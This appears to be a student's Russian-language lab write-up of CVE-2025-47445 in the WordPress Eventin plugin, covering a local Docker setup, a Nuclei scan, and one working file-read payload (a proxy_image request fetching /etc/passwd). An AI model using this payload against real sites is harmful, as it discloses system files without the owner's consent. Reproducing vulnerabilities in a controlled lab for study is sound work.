
Доказательство концепции для CVE-2025-47445
Эта proof of concept основана на школьном задании, где мы хотели найти уязвимый плагин WordPress и протестировать данную уязвимость в локальной контролируемой среде.
| Информация | |
|---|---|
| Плагин WordPress: | Wordpress Eventin |
| Версия плагина: | 4.0.26 (или новее) |
| Информация о CVE: | Project Discovery - Vulnerability library |
| CVEdetails.com | |
| Полезные инструменты: | Wordfence Lab Environment |
| Docker | |
| Burp Suite | |
| Nuclei |
Wordfence Docker WordPress Research Lab предоставляет два разных окружения: одно со старой версией PHP, а мы выберем более новое.
# В папке dockerwp84
docker-compose build
docker-compose up -d
После этого я настроил страницу WordPress через localhost:1337. Я скачал плагин Eventin, а именно версию 4.0.26 из магазина плагинов, установил и активировал его через интерфейс WordPress.
Теперь всё должно быть готово к работе.
Я хочу проверить, сможет ли Nuclei найти интересующую меня CVE, поэтому запускаю экземпляр во временном docker-контейнере.
docker run --rm projectdiscovery/nuclei -u http://host.docker.internal:1337
Я запускал Nuclei несколько раз и получал разные результаты, не знаю почему. Но в итоге он находит CVE и ещё пару вещей, которые я специально не искал.

Чтобы проверить, могу ли я получить доступ к файлу /etc/passwd, я просто вставляю следующий payload в свой GET-запрос.
/wp-admin/admin-ajax.php?action=proxy_image&url=/etc/passwd
И это сработало.

Это было сделано в образовательных целях.
Убедитесь, что вы обновляете всё своё программное обеспечение. Новые CVE обнаруживаются каждый день.